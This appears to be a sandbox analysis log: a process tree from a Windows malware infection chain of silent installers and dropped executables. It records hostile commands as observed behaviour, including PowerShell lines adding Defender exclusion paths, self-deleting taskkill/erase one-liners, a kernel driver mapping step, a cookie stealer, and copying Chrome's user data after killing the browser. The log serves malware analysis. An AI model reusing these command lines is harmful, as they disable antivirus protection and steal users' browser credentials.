C:\Users\Admin\AppData\Local\Temp\is-53BF0.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-53BF0.tmp\zznote.exe" /Verysilent27⤵PID:7132
-
C:\Users\Admin\AppData\Local\Temp\is-NSAKL.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-NSAKL.tmp\zznote.tmp" /SL5="$40EB0,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-53BF0.tmp\zznote.exe" /Verysilent28⤵PID:12436
-
C:\Users\Admin\AppData\Local\Temp\is-M5A4I.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-M5A4I.tmp\jg4_4jaa.exe" /silent29⤵PID:16056
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-53BF0.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-53BF0.tmp\hjjgaa.exe" /Verysilent27⤵PID:10228
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\q1r0euu0ixr\vxtns5h2exw.exe"C:\Users\Admin\AppData\Local\Temp\q1r0euu0ixr\vxtns5h2exw.exe" /ustwo INSTALL23⤵PID:9120
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "vxtns5h2exw.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\q1r0euu0ixr\vxtns5h2exw.exe" & exit24⤵PID:6720
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "vxtns5h2exw.exe" /f25⤵
- Kills process with taskkill
PID:7264
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\auxhl2u2zuu\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\auxhl2u2zuu\chashepro3.exe" /VERYSILENT23⤵PID:6024
-
C:\Users\Admin\AppData\Local\Temp\is-6RO5D.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-6RO5D.tmp\chashepro3.tmp" /SL5="$807B6,1478410,58368,C:\Users\Admin\AppData\Local\Temp\auxhl2u2zuu\chashepro3.exe" /VERYSILENT24⤵PID:12112
-
-
-
C:\Users\Admin\AppData\Local\Temp\ueo4zael3hb\app.exe"C:\Users\Admin\AppData\Local\Temp\ueo4zael3hb\app.exe" /8-2323⤵PID:10116
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Hidden-Water"24⤵PID:5968
-
-
C:\Program Files (x86)\Hidden-Water\7za.exe"C:\Program Files (x86)\Hidden-Water\7za.exe" e -p154.61.71.51 winamp-plugins.7z24⤵PID:13652
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Hidden-Water\app.exe" -map "C:\Program Files (x86)\Hidden-Water\WinmonProcessMonitor.sys""24⤵PID:10788
-
C:\Program Files (x86)\Hidden-Water\app.exe"C:\Program Files (x86)\Hidden-Water\app.exe" -map "C:\Program Files (x86)\Hidden-Water\WinmonProcessMonitor.sys"25⤵PID:10176
-
-
-
C:\Program Files (x86)\Hidden-Water\7za.exe"C:\Program Files (x86)\Hidden-Water\7za.exe" e -p154.61.71.51 winamp.7z24⤵PID:13044
-
-
C:\Program Files (x86)\Hidden-Water\app.exe"C:\Program Files (x86)\Hidden-Water\app.exe" /8-2324⤵PID:15760
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-EIESK.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-EIESK.tmp\Delta.exe" /Verysilent12⤵PID:8360
-
C:\Users\Admin\AppData\Local\Temp\is-LB8K9.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-LB8K9.tmp\Delta.tmp" /SL5="$904EC,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-EIESK.tmp\Delta.exe" /Verysilent13⤵PID:11892
-
C:\Users\Admin\AppData\Local\Temp\is-33Q7T.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-33Q7T.tmp\Setup.exe" /VERYSILENT14⤵PID:7812
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-33Q7T.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit15⤵PID:7560
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f16⤵
- Kills process with taskkill
PID:12688
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-EIESK.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-EIESK.tmp\zznote.exe" /Verysilent12⤵PID:5208
-
C:\Users\Admin\AppData\Local\Temp\is-1DS0G.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-1DS0G.tmp\zznote.tmp" /SL5="$A04EC,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-EIESK.tmp\zznote.exe" /Verysilent13⤵PID:6600
-
C:\Users\Admin\AppData\Local\Temp\is-P9LUL.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-P9LUL.tmp\jg4_4jaa.exe" /silent14⤵PID:2748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-EIESK.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-EIESK.tmp\hjjgaa.exe" /Verysilent12⤵PID:9616
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:8296
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:3276
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\mgzignu03uf\g4vculus0qr.exe"C:\Users\Admin\AppData\Local\Temp\mgzignu03uf\g4vculus0qr.exe" /ustwo INSTALL8⤵PID:7876
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "g4vculus0qr.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\mgzignu03uf\g4vculus0qr.exe" & exit9⤵PID:12884
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "g4vculus0qr.exe" /f10⤵
- Kills process with taskkill
PID:9736
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\aqdexxii1yf\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\aqdexxii1yf\chashepro3.exe" /VERYSILENT8⤵PID:1860
-
C:\Users\Admin\AppData\Local\Temp\is-30UG3.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-30UG3.tmp\chashepro3.tmp" /SL5="$604B8,1478410,58368,C:\Users\Admin\AppData\Local\Temp\aqdexxii1yf\chashepro3.exe" /VERYSILENT9⤵PID:10980
-
-
-
C:\Users\Admin\AppData\Local\Temp\0wxtghty2ci\app.exe"C:\Users\Admin\AppData\Local\Temp\0wxtghty2ci\app.exe" /8-238⤵PID:8544
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Nameless-Night"9⤵PID:5544
-
-
C:\Program Files (x86)\Nameless-Night\7za.exe"C:\Program Files (x86)\Nameless-Night\7za.exe" e -p154.61.71.51 winamp-plugins.7z9⤵PID:9808
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Nameless-Night\app.exe" -map "C:\Program Files (x86)\Nameless-Night\WinmonProcessMonitor.sys""9⤵PID:7620
-
C:\Program Files (x86)\Nameless-Night\app.exe"C:\Program Files (x86)\Nameless-Night\app.exe" -map "C:\Program Files (x86)\Nameless-Night\WinmonProcessMonitor.sys"10⤵PID:5076
-
-
-
C:\Program Files (x86)\Nameless-Night\7za.exe"C:\Program Files (x86)\Nameless-Night\7za.exe" e -p154.61.71.51 winamp.7z9⤵PID:12012
-
-
C:\Program Files (x86)\Nameless-Night\app.exe"C:\Program Files (x86)\Nameless-Night\app.exe" /8-239⤵PID:12392
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4328
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4864 -
C:\Users\Admin\AppData\Roaming\B9B1.tmp.exe"C:\Users\Admin\AppData\Roaming\B9B1.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5020 -
C:\Users\Admin\AppData\Roaming\B9B1.tmp.exe"C:\Users\Admin\AppData\Roaming\B9B1.tmp.exe"6⤵
- Executes dropped EXE
PID:4152
-
-
-
C:\Users\Admin\AppData\Roaming\BB29.tmp.exe"C:\Users\Admin\AppData\Roaming\BB29.tmp.exe"5⤵
- Executes dropped EXE
PID:4352 -
C:\Users\Admin\AppData\Roaming\BB29.tmp.exe"{path}"6⤵PID:5316
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:5104
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵
- Executes dropped EXE
PID:5088 -
C:\ProgramData\8108787.89"C:\ProgramData\8108787.89"5⤵PID:5464
-
-
C:\ProgramData\3596436.39"C:\ProgramData\3596436.39"5⤵PID:5520
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵PID:6120
-
-
-
C:\ProgramData\1026638.11"C:\ProgramData\1026638.11"5⤵PID:5576
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:5680
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:5280
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:4104
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7FA502F6DB0AB5F7A87B9D8CACC7B71D C2⤵
- Loads dropped DLL
PID:3488
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Muddy-Frog"1⤵PID:4836
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:1188
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:3784
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3784 -s 15042⤵
- Program crash
PID:3996
-
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:3916
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5524
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6684
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6868
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4392
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:7276
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{659c0630-7ab5-6644-971b-b70d288aca47}\oemvista.inf" "9" "4d14a44ff" "0000000000000184" "WinSta0\Default" "0000000000000188" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:7348
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000120"2⤵PID:6492
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:7732
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:7720
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:8848
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:6764
-
-
C:\Users\Admin\AppData\Local\Temp\is-VTN29.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-VTN29.tmp\vict.tmp" /SL5="$405CE,870426,780800,C:\Users\Admin\AppData\Local\Temp\cnr2iie4x5h\vict.exe" /VERYSILENT /id=5351⤵PID:1000
-
C:\Users\Admin\AppData\Local\Temp\is-1NGIK.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-1NGIK.tmp\wimapi.exe" 5352⤵PID:8256
-
C:\Users\Admin\AppData\Local\Temp\Jr1kGczRf.exe"C:\Users\Admin\AppData\Local\Temp\Jr1kGczRf.exe"3⤵PID:2664
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5460
-
C:\Users\Admin\AppData\Local\Temp\83EC.tmp.exeC:\Users\Admin\AppData\Local\Temp\83EC.tmp.exe1⤵PID:12248
-
C:\Users\Admin\AppData\Local\Temp\9497.tmp.exeC:\Users\Admin\AppData\Local\Temp\9497.tmp.exe1⤵PID:5252
-
C:\Users\Admin\AppData\Local\Temp\9D62.tmp.exeC:\Users\Admin\AppData\Local\Temp\9D62.tmp.exe1⤵PID:4776
-
C:\Users\Admin\AppData\Local\Temp\AE0D.tmp.exeC:\Users\Admin\AppData\Local\Temp\AE0D.tmp.exe1⤵PID:10060
-
C:\Users\Admin\AppData\Local\Temp\B6D8.tmp.exeC:\Users\Admin\AppData\Local\Temp\B6D8.tmp.exe1⤵PID:7652
-
C:\Users\Admin\AppData\Local\Temp\BF55.tmp.exeC:\Users\Admin\AppData\Local\Temp\BF55.tmp.exe1⤵PID:500
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:7460
-
C:\Users\Admin\AppData\Local\Temp\CB6B.tmp.exeC:\Users\Admin\AppData\Local\Temp\CB6B.tmp.exe1⤵PID:7352
-
C:\Users\Admin\AppData\Local\Temp\1461074104.exe"C:\Users\Admin\AppData\Local\Temp\1461074104.exe"2⤵PID:9764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9764 -s 2723⤵
- Program crash
PID:10016
-
-
-
C:\Users\Admin\AppData\Local\Temp\1074905031.exe"C:\Users\Admin\AppData\Local\Temp\1074905031.exe"2⤵PID:10044
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5628
-
C:\Users\Admin\AppData\Local\Temp\D87C.tmp.exeC:\Users\Admin\AppData\Local\Temp\D87C.tmp.exe1⤵PID:8628
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8596
-
C:\Users\Admin\AppData\Local\Temp\E270.tmp.exeC:\Users\Admin\AppData\Local\Temp\E270.tmp.exe1⤵PID:9500
-
C:\Users\Admin\AppData\Local\Temp\F686.tmp.exeC:\Users\Admin\AppData\Local\Temp\F686.tmp.exe1⤵PID:10376
-
C:\Users\Admin\AppData\Local\Temp\3A6.tmp.exeC:\Users\Admin\AppData\Local\Temp\3A6.tmp.exe1⤵PID:10924
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:11108
-
C:\Users\Admin\AppData\Local\Temp\EA3.tmp.exeC:\Users\Admin\AppData\Local\Temp\EA3.tmp.exe1⤵PID:10536
-
C:\Users\Admin\AppData\Local\Temp\EA3.tmp.exe"C:\Users\Admin\AppData\Local\Temp\EA3.tmp.exe"2⤵PID:5916
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:11984
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:12548
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:12772
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:13008
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4048
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:2376
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6860
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7744
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6392
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:12420
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9052
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffc9d706e00,0x7ffc9d706e10,0x7ffc9d706e201⤵PID:8188
-
C:\Users\Admin\AppData\Local\Temp\is-SAHLO.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-SAHLO.tmp\Setup3310.tmp" /SL5="$10BD0,802346,56832,C:\Users\Admin\AppData\Local\Temp\wwi40jet0ak\Setup3310.exe" /Verysilent /subid=5771⤵PID:5956
-
C:\Users\Admin\AppData\Local\Temp\is-B0G9N.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-B0G9N.tmp\Setup.exe" /Verysilent2⤵PID:14312
-
C:\Users\Admin\AppData\Local\Temp\is-0VHAD.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-0VHAD.tmp\Setup.tmp" /SL5="$20B06,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-B0G9N.tmp\Setup.exe" /Verysilent3⤵PID:13552
-
C:\Users\Admin\AppData\Local\Temp\is-V0D24.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-V0D24.tmp\PictureLAb.exe" /Verysilent4⤵PID:7244
-
C:\Users\Admin\AppData\Local\Temp\is-TADLV.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-TADLV.tmp\PictureLAb.tmp" /SL5="$10E32,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-V0D24.tmp\PictureLAb.exe" /Verysilent5⤵PID:7336
-
C:\Users\Admin\AppData\Local\Temp\is-90C93.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-90C93.tmp\Setup.exe" /VERYSILENT6⤵PID:9176
-
C:\Users\Admin\AppData\Local\Temp\is-8K728.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-8K728.tmp\Setup.tmp" /SL5="$50B1A,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-90C93.tmp\Setup.exe" /VERYSILENT7⤵PID:14216
-
C:\Users\Admin\AppData\Local\Temp\is-L1PDI.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-L1PDI.tmp\def.exe" /S /UID=lab2148⤵PID:6428
-
C:\Users\Admin\AppData\Local\Temp\2c-2ff81-1ee-7f4b7-16eaaa9b1eaeb\Cabavulirae.exe"C:\Users\Admin\AppData\Local\Temp\2c-2ff81-1ee-7f4b7-16eaaa9b1eaeb\Cabavulirae.exe"9⤵PID:12692
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nsst3dnz.jpq\customer4.exe & exit10⤵PID:14436
-
C:\Users\Admin\AppData\Local\Temp\nsst3dnz.jpq\customer4.exeC:\Users\Admin\AppData\Local\Temp\nsst3dnz.jpq\customer4.exe11⤵PID:9872
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"12⤵PID:2156
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\stgmq4wp.1qp\askinstall18.exe & exit10⤵PID:15024
-
C:\Users\Admin\AppData\Local\Temp\stgmq4wp.1qp\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\stgmq4wp.1qp\askinstall18.exe11⤵PID:14540
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe12⤵PID:16372
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe13⤵
- Kills process with taskkill
PID:15748
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y12⤵PID:14736
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3migps2a.xks\md7_7dfj.exe & exit10⤵PID:15928
-
C:\Users\Admin\AppData\Local\Temp\3migps2a.xks\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\3migps2a.xks\md7_7dfj.exe11⤵PID:15156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uwqcpzre.p4y\privacytools5.exe & exit10⤵PID:15380
-
C:\Users\Admin\AppData\Local\Temp\uwqcpzre.p4y\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\uwqcpzre.p4y\privacytools5.exe11⤵PID:14764
-
C:\Users\Admin\AppData\Local\Temp\uwqcpzre.p4y\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\uwqcpzre.p4y\privacytools5.exe12⤵PID:13904
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mg1p3xtq.0yq\GcleanerWW.exe /mixone & exit10⤵PID:13724
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iw1xf1vl.1l2\setup.exe /8-2222 & exit10⤵PID:10276
-
C:\Users\Admin\AppData\Local\Temp\iw1xf1vl.1l2\setup.exeC:\Users\Admin\AppData\Local\Temp\iw1xf1vl.1l2\setup.exe /8-222211⤵PID:15048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zheljucl.40n\MultitimerFour.exe & exit10⤵PID:7828
-
C:\Users\Admin\AppData\Local\Temp\zheljucl.40n\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\zheljucl.40n\MultitimerFour.exe11⤵PID:5240
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-V0D24.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-V0D24.tmp\Delta.exe" /Verysilent4⤵PID:4040
-
C:\Users\Admin\AppData\Local\Temp\is-6EC2U.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-6EC2U.tmp\Delta.tmp" /SL5="$30DAC,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-V0D24.tmp\Delta.exe" /Verysilent5⤵PID:12484
-
C:\Users\Admin\AppData\Local\Temp\is-E1RT0.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-E1RT0.tmp\Setup.exe" /VERYSILENT6⤵PID:4460
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-E1RT0.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit7⤵PID:15272
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f8⤵
- Kills process with taskkill
PID:8152
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-V0D24.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-V0D24.tmp\zznote.exe" /Verysilent4⤵PID:7320
-
C:\Users\Admin\AppData\Local\Temp\is-SV9J4.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-SV9J4.tmp\zznote.tmp" /SL5="$30EA6,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-V0D24.tmp\zznote.exe" /Verysilent5⤵PID:8916
-
C:\Users\Admin\AppData\Local\Temp\is-QIVQQ.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-QIVQQ.tmp\jg4_4jaa.exe" /silent6⤵PID:14504
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-V0D24.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-V0D24.tmp\hjjgaa.exe" /Verysilent4⤵PID:11660
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:15220
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:15300
-
-
-
-
-
